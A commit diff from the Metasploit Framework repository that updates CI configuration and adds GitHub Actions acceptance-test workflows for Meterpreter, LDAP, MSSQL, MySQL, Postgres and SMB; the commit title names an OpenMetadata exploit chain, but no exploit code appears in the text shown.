automatic module_metadata_base.json update

Land #19347 , OpenMetadata authentication bypass and SpEL injection exploit chain[CVE-2024-28255 and CVE-2024-28254]
2024-08-14 10:22:19 -05:00 · 2024-08-14 16:06:10 +01:00 · 2024-08-14 09:42:31 -05:00 · 2024-08-14 10:22:29 -04:00 · 2024-08-14 04:30:49 -05:00 · 2024-08-14 10:06:21 +01:00
902 changed files with 66343 additions and 9259 deletions
@@ -2,4 +2,7 @@ blank_issues_enabled: false
 contact_links:
  - name: Termux Issues?
    url: https://github.com/rapid7/metasploit-framework/issues/11023
-    about: Termux is not officially supported, check here for more info
+    about: Termux is not officially supported, check here for more info
+  - name: Android Payload Issues?
+    url: https://github.com/rapid7/metasploit-framework/issues/19154
+    about: Check here for more info
@@ -38,7 +38,9 @@ on:
      - 'lib/msf/core/**'
      - 'tools/dev/**'
      - 'spec/acceptance/**'
+      - 'spec/support/acceptance/**'
      - 'spec/acceptance_spec_helper.rb'
+      - '.github/**'
 #   Example of running as a cron, to weed out flaky tests
 #  schedule:
 #    - cron: '*/15 * * * *'
@@ -50,7 +52,7 @@ jobs:
      fail-fast: false
      matrix:
        os:
-          - macos-11
+          - macos-12
          - windows-2019
          - ubuntu-20.04
        ruby:
@@ -60,20 +62,21 @@ jobs:
          - { name: python, runtime_version: 3.6 }
          - { name: python, runtime_version: 3.11 }

-          # Java - newer versions of Java are not supported currently: https://github.com/rapid7/metasploit-payloads/issues/647
+          # Java
          - { name: java, runtime_version: 8 }
+          - { name: java, runtime_version: 21 }

-          # PHP - Temporarily removed as tests are timing out on Github actions
-          # - { name: php, runtime_version: 5.3 }
-          # - { name: php, runtime_version: 7.4 }
-          # - { name: php, runtime_version: 8.2 }
+          # PHP
+          - { name: php, runtime_version: 5.3 }
+          - { name: php, runtime_version: 7.4 }
+          - { name: php, runtime_version: 8.3 }
        include:
          # Windows Meterpreter
          - { meterpreter: { name: windows_meterpreter }, os: windows-2019 }
          - { meterpreter: { name: windows_meterpreter }, os: windows-2022 }

          # Mettle
-          - { meterpreter: { name: mettle }, os: macos-11 }
+          - { meterpreter: { name: mettle }, os: macos-12 }
          - { meterpreter: { name: mettle }, os: ubuntu-20.04 }

    runs-on: ${{ matrix.os }}
@@ -85,6 +88,7 @@ jobs:
      HOST_RUNNER_IMAGE: ${{ matrix.os }}
      METERPRETER: ${{ matrix.meterpreter.name }}
      METERPRETER_RUNTIME_VERSION: ${{ matrix.meterpreter.runtime_version }}
+      BUNDLE_WITHOUT: "coverage development"

    name: ${{ matrix.meterpreter.name }} ${{ matrix.meterpreter.runtime_version }} ${{ matrix.os }}
    steps:
@@ -92,7 +96,7 @@ jobs:
        if: runner.os == 'Linux'
        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz

-      - uses: shivammathur/setup-php@6d7209f44a25a59e904b1ee9f3b0c33ab2cd888d
+      - uses: shivammathur/setup-php@fc14643b0a99ee9db10a3c025a33d76544fa3761
        if: ${{ matrix.meterpreter.name == 'php' }}
        with:
          php-version: ${{ matrix.meterpreter.runtime_version }}
@@ -100,11 +104,11 @@ jobs:

      - name: Set up Python
        if: ${{ matrix.meterpreter.name == 'python' }}
-        uses: actions/setup-python@v4
+        uses: actions/setup-python@v5
        with:
          python-version: ${{ matrix.meterpreter.runtime_version }}

-      - uses: actions/setup-java@v3
+      - uses: actions/setup-java@v4
        if: ${{ matrix.meterpreter.name == 'java' }}
        with:
          distribution: temurin
@@ -126,11 +130,10 @@ jobs:
          type %WINDIR%\\system32\\drivers\\etc\\hosts

      - name: Checkout code
-        uses: actions/checkout@v3
+        uses: actions/checkout@v4

      - name: Setup Ruby
        env:
-          BUNDLE_WITHOUT: "coverage development"
          BUNDLE_FORCE_RUBY_PLATFORM: true
        uses: ruby/setup-ruby@v1
        with:
@@ -153,11 +156,11 @@ jobs:
        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
        run: |
-          bundle exec rspec spec/acceptance/
+          bundle exec rspec spec/acceptance/meterpreter_spec.rb

      - name: Archive results
        if: always()
-        uses: actions/upload-artifact@v3
+        uses: actions/upload-artifact@v4
        with:
          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
          name: raw-data-${{ matrix.meterpreter.name }}-${{ matrix.meterpreter.runtime_version }}-${{ matrix.os }}
@@ -172,7 +175,7 @@ jobs:

    steps:
      - name: Checkout code
-        uses: actions/checkout@v3
+        uses: actions/checkout@v4
        if: always()

      - name: Install system dependencies (Linux)
@@ -182,18 +185,17 @@ jobs:
      - name: Setup Ruby
        if: always()
        env:
-          BUNDLE_WITHOUT: "coverage development"
          BUNDLE_FORCE_RUBY_PLATFORM: true
        uses: ruby/setup-ruby@v1
        with:
-          ruby-version: 3.0.2
+          ruby-version: '${{ matrix.ruby }}'
          bundler-cache: true
          cache-version: 4
          # Github actions with Ruby requires Bundler 2.2.18+
          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
          bundler: 2.2.33

-      - uses: actions/download-artifact@v3
+      - uses: actions/download-artifact@v4
        id: download
        if: always()
        with:
@@ -216,7 +218,7 @@ jobs:

      - name: archive results
        if: always()
-        uses: actions/upload-artifact@v3
+        uses: actions/upload-artifact@v4
        with:
          name: final-report-${{ github.run_id }}
          path: |
@@ -43,7 +43,7 @@ jobs:
    name: Ruby ${{ matrix.ruby }}
    steps:
      - name: Checkout code
-        uses: actions/checkout@v3
+        uses: actions/checkout@v4

      - name: Setup Ruby
        uses: ruby/setup-ruby@v1
@@ -195,7 +195,7 @@ jobs:
                  close: true,
                  comment: `
                    Thanks for your contribution to Metasploit Framework! We've looked at this issue, and unfortunately we do not currently have the bandwidth to prioritize this issue.
-            
+
                    We've labeled this as \`attic\` and closed it for now. If you believe this issue has been closed in error, or that it should be prioritized, please comment with additional information.
                  `
                }
@@ -0,0 +1,164 @@
+name: Acceptance
+
+# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
+#concurrency:
+#  group: ${{ github.ref }}-${{ github.workflow }}
+#  cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
+
+# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
+permissions:
+  actions: none
+  checks: none
+  contents: none
+  deployments: none
+  id-token: none
+  issues: none
+  discussions: none
+  packages: none
+  pages: none
+  pull-requests: none
+  repository-projects: none
+  security-events: none
+  statuses: none
+
+on:
+  push:
+    branches-ignore:
+      - gh-pages
+      - metakitty
+  pull_request:
+    branches:
+      - '*'
+    paths:
+      - 'metsploit-framework.gemspec'
+      - 'Gemfile.lock'
+      - '**/**ldap**'
+      - 'spec/acceptance/**'
+      - 'spec/support/acceptance/**'
+      - 'spec/acceptance_spec_helper.rb'
+      - '.github/**'
+#   Example of running as a cron, to weed out flaky tests
+#  schedule:
+#    - cron: '*/15 * * * *'
+
+jobs:
+  ldap:
+    runs-on: ${{ matrix.os }}
+    timeout-minutes: 40
+
+    strategy:
+      fail-fast: true
+      matrix:
+        ruby:
+          - '3.2'
+        os:
+          - ubuntu-latest
+
+    env:
+      RAILS_ENV: test
+      BUNDLE_WITHOUT: "coverage development pcap"
+
+    name: LDAP Acceptance - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
+    steps:
+      - name: Install system dependencies
+        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
+
+      - name: Checkout code
+        uses: actions/checkout@v4
+
+      - name: Run samba/ldap docker container
+        working-directory: 'test/ldap'
+        run: |
+          docker compose build
+          docker compose up --wait -d
+
+      - name: Setup Ruby
+        env:
+          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
+          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+
+      - name: acceptance
+        env:
+          SPEC_HELPER_LOAD_METASPLOIT: false
+          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
+          RUNTIME_VERSION: latest
+        # Unix run command:
+        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
+        # Windows cmd command:
+        #   set SPEC_HELPER_LOAD_METASPLOIT=false
+        #   bundle exec rspec .\spec\acceptance
+        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
+        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
+        run: |
+          bundle exec rspec spec/acceptance/ldap_spec.rb
+
+      - name: Archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
+          name: ldap-acceptance-${{ matrix.os }}
+          path: tmp/allure-raw-data
+
+  # Generate a final report from the previous test results
+  report:
+    name: Generate report
+    needs:
+      - ldap
+    runs-on: ubuntu-latest
+    if: always()
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v4
+        if: always()
+
+      - name: Install system dependencies (Linux)
+        if: always()
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - name: Setup Ruby
+        if: always()
+        env:
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+          cache-version: 4
+          # Github actions with Ruby requires Bundler 2.2.18+
+          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
+          bundler: 2.2.33
+
+      - uses: actions/download-artifact@v4
+        id: download
+        if: always()
+        with:
+          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
+          path: raw-data
+
+      - name: allure generate
+        if: always()
+        run: |
+          export VERSION=2.22.1
+
+          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
+          tar -zxvf allure-$VERSION.tgz -C .
+
+          ls -la ${{steps.download.outputs.download-path}}
+          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
+
+          find ${{steps.download.outputs.download-path}}
+          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
+
+      - name: archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          name: final-report-${{ github.run_id }}
+          path: |
+            ./allure-report
@@ -31,11 +31,14 @@ jobs:
    runs-on: ubuntu-latest
    timeout-minutes: 40

+    env:
+      BUNDLE_WITHOUT: "coverage development pcap"
+
    strategy:
      fail-fast: true
      matrix:
        ruby:
-          - '3.0'
+          - '3.1'

    name: Lint msftidy
    steps:
@@ -43,7 +46,7 @@ jobs:
        run: sudo apt-get install libpcap-dev graphviz

      - name: Checkout code
-        uses: actions/checkout@v3
+        uses: actions/checkout@v4
        # Required to checkout HEAD^ and 3a046f01dae340c124dd3895e670983aef5fe0c5 for the msftidy script
        # https://github.com/actions/checkout/tree/5a4ac9002d0be2fb38bd78e4b4dbde5606d7042f#checkout-head
        with:
@@ -53,8 +56,6 @@ jobs:
        with:
          ruby-version: '${{ matrix.ruby }}'
          bundler-cache: true
-        env:
-          BUNDLE_WITHOUT: "coverage development pcap"

      - name: Run msftidy
        run: |
@@ -0,0 +1,183 @@
+name: Acceptance
+
+# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
+#concurrency:
+#  group: ${{ github.ref }}-${{ github.workflow }}
+#  cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
+
+# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
+permissions:
+  actions: none
+  checks: none
+  contents: none
+  deployments: none
+  id-token: none
+  issues: none
+  discussions: none
+  packages: none
+  pages: none
+  pull-requests: none
+  repository-projects: none
+  security-events: none
+  statuses: none
+
+on:
+  push:
+    branches-ignore:
+      - gh-pages
+      - metakitty
+  pull_request:
+    branches:
+      - '*'
+    paths:
+      - 'metsploit-framework.gemspec'
+      - 'Gemfile.lock'
+      - '**/**mssql**'
+      - 'spec/acceptance/**'
+      - 'spec/support/acceptance/**'
+      - 'spec/acceptance_spec_helper.rb'
+      - '.github/**'
+#   Example of running as a cron, to weed out flaky tests
+#  schedule:
+#    - cron: '*/15 * * * *'
+
+jobs:
+  mssql:
+    runs-on: ${{ matrix.os }}
+    timeout-minutes: 40
+
+    services:
+      mssql:
+        image: ${{ matrix.docker_image }}
+        ports: ["1433:1433"]
+        env:
+          MSSQL_SA_PASSWORD: yourStrong(!)Password
+          ACCEPT_EULA: 'Y'
+        options: >-
+          --health-cmd "/opt/mssql-tools/bin/sqlcmd -U sa -P 'yourStrong(!)Password' -Q 'select 1' -b -o /dev/null"
+          --health-interval 10s
+          --health-timeout 5s
+          --health-retries 5
+
+    strategy:
+      fail-fast: true
+      matrix:
+        ruby:
+          - '3.2'
+        os:
+          - ubuntu-latest
+        docker_image:
+          - mcr.microsoft.com/mssql/server:2022-latest
+          - mcr.microsoft.com/mssql/server:2019-latest
+
+    env:
+      RAILS_ENV: test
+      BUNDLE_WITHOUT: "coverage development pcap"
+
+
+    name: ${{ matrix.docker_image }} - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
+    steps:
+      - name: Install system dependencies
+        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
+
+      - name: Checkout code
+        uses: actions/checkout@v4
+
+      - name: Setup Ruby
+        env:
+          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
+          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+
+      - name: Extract runtime version
+        run: |
+          echo "RUNTIME_VERSION=$(echo $DOCKER_IMAGE | awk -F: '{ print $2 }')" >> $GITHUB_ENV
+          echo "DOCKER_IMAGE_FILENAME=$(echo $DOCKER_IMAGE | tr -d '/:')" >> $GITHUB_ENV
+        env:
+          DOCKER_IMAGE: ${{ matrix.docker_image }}
+          OS: ${{ matrix.os }}
+
+      - name: acceptance
+        env:
+          SPEC_HELPER_LOAD_METASPLOIT: false
+          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
+          RUNTIME_VERSION: ${{ env.RUNTIME_VERSION }}
+        # Unix run command:
+        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
+        # Windows cmd command:
+        #   set SPEC_HELPER_LOAD_METASPLOIT=false
+        #   bundle exec rspec .\spec\acceptance
+        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
+        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
+        run: |
+          bundle exec rspec spec/acceptance/mssql_spec.rb
+
+      - name: Archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
+          name: ${{ env.DOCKER_IMAGE_FILENAME }}-${{ matrix.os }}
+          path: tmp/allure-raw-data
+
+  # Generate a final report from the previous test results
+  report:
+    name: Generate report
+    needs:
+      - mssql
+    runs-on: ubuntu-latest
+    if: always()
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v4
+        if: always()
+
+      - name: Install system dependencies (Linux)
+        if: always()
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - name: Setup Ruby
+        if: always()
+        env:
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+          cache-version: 4
+          # Github actions with Ruby requires Bundler 2.2.18+
+          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
+          bundler: 2.2.33
+
+      - uses: actions/download-artifact@v4
+        id: download
+        if: always()
+        with:
+          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
+          path: raw-data
+
+      - name: allure generate
+        if: always()
+        run: |
+          export VERSION=2.22.1
+
+          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
+          tar -zxvf allure-$VERSION.tgz -C .
+
+          ls -la ${{steps.download.outputs.download-path}}
+          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
+
+          find ${{steps.download.outputs.download-path}}
+          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
+
+      - name: archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          name: final-report-${{ github.run_id }}
+          path: |
+            ./allure-report
@@ -0,0 +1,180 @@
+name: Acceptance
+
+# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
+#concurrency:
+#  group: ${{ github.ref }}-${{ github.workflow }}
+#  cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
+
+# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
+permissions:
+  actions: none
+  checks: none
+  contents: none
+  deployments: none
+  id-token: none
+  issues: none
+  discussions: none
+  packages: none
+  pages: none
+  pull-requests: none
+  repository-projects: none
+  security-events: none
+  statuses: none
+
+on:
+  push:
+    branches-ignore:
+      - gh-pages
+      - metakitty
+  pull_request:
+    branches:
+      - '*'
+    paths:
+      - 'metsploit-framework.gemspec'
+      - 'Gemfile.lock'
+      - '**/**mysql**'
+      - 'spec/acceptance/**'
+      - 'spec/support/acceptance/**'
+      - 'spec/acceptance_spec_helper.rb'
+      - '.github/**'
+#   Example of running as a cron, to weed out flaky tests
+#  schedule:
+#    - cron: '*/15 * * * *'
+
+jobs:
+  mysql:
+    runs-on: ${{ matrix.os }}
+    timeout-minutes: 40
+
+    services:
+      mysql:
+        image: ${{ matrix.target.version }}
+        ports: ["3306:3306"]
+        env:
+          MYSQL_ROOT_PASSWORD: password
+        options: >-
+          --health-cmd "${{ matrix.target.health_cmd }}"
+          --health-interval 10s
+          --health-timeout 10s
+          --health-retries 5
+    strategy:
+      fail-fast: true
+      matrix:
+        ruby:
+          - '3.2'
+        os:
+          - ubuntu-latest
+        target:
+          - { version: "mariadb:latest", health_cmd: "mariadb -uroot -ppassword -e 'SELECT version()'" }
+          - { version: "mysql:latest", health_cmd: "mysql -uroot -ppassword -e 'SELECT version()'" }
+
+    env:
+      RAILS_ENV: test
+      BUNDLE_WITHOUT: "coverage development pcap"
+
+    name: ${{ matrix.target.version }} - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
+    steps:
+      - name: Install system dependencies
+        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
+
+      - name: Checkout code
+        uses: actions/checkout@v4
+
+      - name: Setup Ruby
+        env:
+          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
+          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+
+      - name: Extract runtime version
+        run: |
+          echo "RUNTIME_VERSION=$(echo $DOCKER_IMAGE | awk -F: '{ print $2 }')" >> $GITHUB_ENV
+          echo "DOCKER_IMAGE_FILENAME=$(echo $DOCKER_IMAGE | tr -d ':')" >> $GITHUB_ENV
+        env:
+          DOCKER_IMAGE: ${{ matrix.target.version }}
+          OS: ${{ matrix.os }}
+
+      - name: acceptance
+        env:
+          SPEC_HELPER_LOAD_METASPLOIT: false
+          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
+          RUNTIME_VERSION: ${{ env.RUNTIME_VERSION }}
+        # Unix run command:
+        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
+        # Windows cmd command:
+        #   set SPEC_HELPER_LOAD_METASPLOIT=false
+        #   bundle exec rspec .\spec\acceptance
+        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
+        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
+        run: |
+          bundle exec rspec spec/acceptance/mysql_spec.rb
+
+      - name: Archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
+          name: ${{ env.DOCKER_IMAGE_FILENAME }}-${{ matrix.os }}
+          path: tmp/allure-raw-data
+
+  # Generate a final report from the previous test results
+  report:
+    name: Generate report
+    needs:
+      - mysql
+    runs-on: ubuntu-latest
+    if: always()
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v4
+        if: always()
+
+      - name: Install system dependencies (Linux)
+        if: always()
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - name: Setup Ruby
+        if: always()
+        env:
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+          cache-version: 4
+          # Github actions with Ruby requires Bundler 2.2.18+
+          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
+          bundler: 2.2.33
+
+      - uses: actions/download-artifact@v4
+        id: download
+        if: always()
+        with:
+          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
+          path: raw-data
+
+      - name: allure generate
+        if: always()
+        run: |
+          export VERSION=2.22.1
+
+          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
+          tar -zxvf allure-$VERSION.tgz -C .
+
+          ls -la ${{steps.download.outputs.download-path}}
+          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
+
+          find ${{steps.download.outputs.download-path}}
+          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
+
+      - name: archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          name: final-report-${{ github.run_id }}
+          path: |
+            ./allure-report
@@ -0,0 +1,182 @@
+name: Acceptance
+
+# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
+#concurrency:
+#  group: ${{ github.ref }}-${{ github.workflow }}
+#  cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
+
+# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
+permissions:
+  actions: none
+  checks: none
+  contents: none
+  deployments: none
+  id-token: none
+  issues: none
+  discussions: none
+  packages: none
+  pages: none
+  pull-requests: none
+  repository-projects: none
+  security-events: none
+  statuses: none
+
+on:
+  push:
+    branches-ignore:
+      - gh-pages
+      - metakitty
+  pull_request:
+    branches:
+      - '*'
+    paths:
+      - 'metsploit-framework.gemspec'
+      - 'Gemfile.lock'
+      - '**/**postgres**'
+      - 'spec/acceptance/**'
+      - 'spec/support/acceptance/**'
+      - 'spec/acceptance_spec_helper.rb'
+      - '.github/**'
+#   Example of running as a cron, to weed out flaky tests
+#  schedule:
+#    - cron: '*/15 * * * *'
+
+jobs:
+  postgres:
+    runs-on: ${{ matrix.os }}
+    timeout-minutes: 40
+
+    services:
+      postgres:
+        image: ${{ matrix.docker_image }}
+        ports: ["5432:5432"]
+        env:
+          POSTGRES_USER: postgres
+          POSTGRES_PASSWORD: password
+        options: >-
+          --health-cmd pg_isready
+          --health-interval 10s
+          --health-timeout 5s
+          --health-retries 5
+
+    strategy:
+      fail-fast: true
+      matrix:
+        ruby:
+          - '3.2'
+        os:
+          - ubuntu-latest
+        docker_image:
+          - postgres:9.4
+          - postgres:16.2
+
+    env:
+      RAILS_ENV: test
+      BUNDLE_WITHOUT: "coverage development pcap"
+
+    name: ${{ matrix.docker_image }} - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
+    steps:
+      - name: Install system dependencies
+        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
+
+      - name: Checkout code
+        uses: actions/checkout@v4
+
+      - name: Setup Ruby
+        env:
+          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
+          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+
+      - name: Extract runtime version
+        run: |
+          echo "RUNTIME_VERSION=$(echo $DOCKER_IMAGE | awk -F: '{ print $2 }')" >> $GITHUB_ENV
+          echo "DOCKER_IMAGE_FILENAME=$(echo $DOCKER_IMAGE | tr -d ':')" >> $GITHUB_ENV
+        env:
+          DOCKER_IMAGE: ${{ matrix.docker_image }}
+          OS: ${{ matrix.os }}
+
+      - name: acceptance
+        env:
+          SPEC_HELPER_LOAD_METASPLOIT: false
+          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
+          RUNTIME_VERSION: ${{ env.RUNTIME_VERSION }}
+        # Unix run command:
+        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
+        # Windows cmd command:
+        #   set SPEC_HELPER_LOAD_METASPLOIT=false
+        #   bundle exec rspec .\spec\acceptance
+        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
+        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
+        run: |
+          bundle exec rspec spec/acceptance/postgres_spec.rb
+
+      - name: Archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
+          name: ${{ env.DOCKER_IMAGE_FILENAME }}-${{ matrix.os }}
+          path: tmp/allure-raw-data
+
+  # Generate a final report from the previous test results
+  report:
+    name: Generate report
+    needs:
+      - postgres
+    runs-on: ubuntu-latest
+    if: always()
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v4
+        if: always()
+
+      - name: Install system dependencies (Linux)
+        if: always()
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - name: Setup Ruby
+        if: always()
+        env:
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+          cache-version: 4
+          # Github actions with Ruby requires Bundler 2.2.18+
+          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
+          bundler: 2.2.33
+
+      - uses: actions/download-artifact@v4
+        id: download
+        if: always()
+        with:
+          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
+          path: raw-data
+
+      - name: allure generate
+        if: always()
+        run: |
+          export VERSION=2.22.1
+
+          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
+          tar -zxvf allure-$VERSION.tgz -C .
+
+          ls -la ${{steps.download.outputs.download-path}}
+          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
+
+          find ${{steps.download.outputs.download-path}}
+          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
+
+      - name: archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          name: final-report-${{ github.run_id }}
+          path: |
+            ./allure-report
@@ -0,0 +1,166 @@
+name: Acceptance
+
+# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
+#concurrency:
+#  group: ${{ github.ref }}-${{ github.workflow }}
+#  cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
+
+# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
+permissions:
+  actions: none
+  checks: none
+  contents: none
+  deployments: none
+  id-token: none
+  issues: none
+  discussions: none
+  packages: none
+  pages: none
+  pull-requests: none
+  repository-projects: none
+  security-events: none
+  statuses: none
+
+on:
+  push:
+    branches-ignore:
+      - gh-pages
+      - metakitty
+  pull_request:
+    branches:
+      - '*'
+    paths:
+      - 'metsploit-framework.gemspec'
+      - 'Gemfile.lock'
+      - '**/**smb**'
+      - 'spec/acceptance/**'
+      - 'spec/support/acceptance/**'
+      - 'spec/acceptance_spec_helper.rb'
+      - '.github/**'
+#   Example of running as a cron, to weed out flaky tests
+#  schedule:
+#    - cron: '*/15 * * * *'
+
+jobs:
+  smb:
+    runs-on: ${{ matrix.os }}
+    timeout-minutes: 40
+
+    strategy:
+      fail-fast: true
+      matrix:
+        ruby:
+          - '3.2'
+        os:
+          - ubuntu-latest
+
+    env:
+      RAILS_ENV: test
+      SMB_USERNAME: acceptance_tests_user
+      SMB_PASSWORD: acceptance_tests_password
+      BUNDLE_WITHOUT: "coverage development pcap"
+
+    name: SMB Acceptance - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
+    steps:
+      - name: Install system dependencies
+        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
+
+      - name: Checkout code
+        uses: actions/checkout@v4
+
+      - name: Run docker container
+        working-directory: 'test/smb'
+        run: |
+          docker compose build
+          docker compose up --wait -d
+
+      - name: Setup Ruby
+        env:
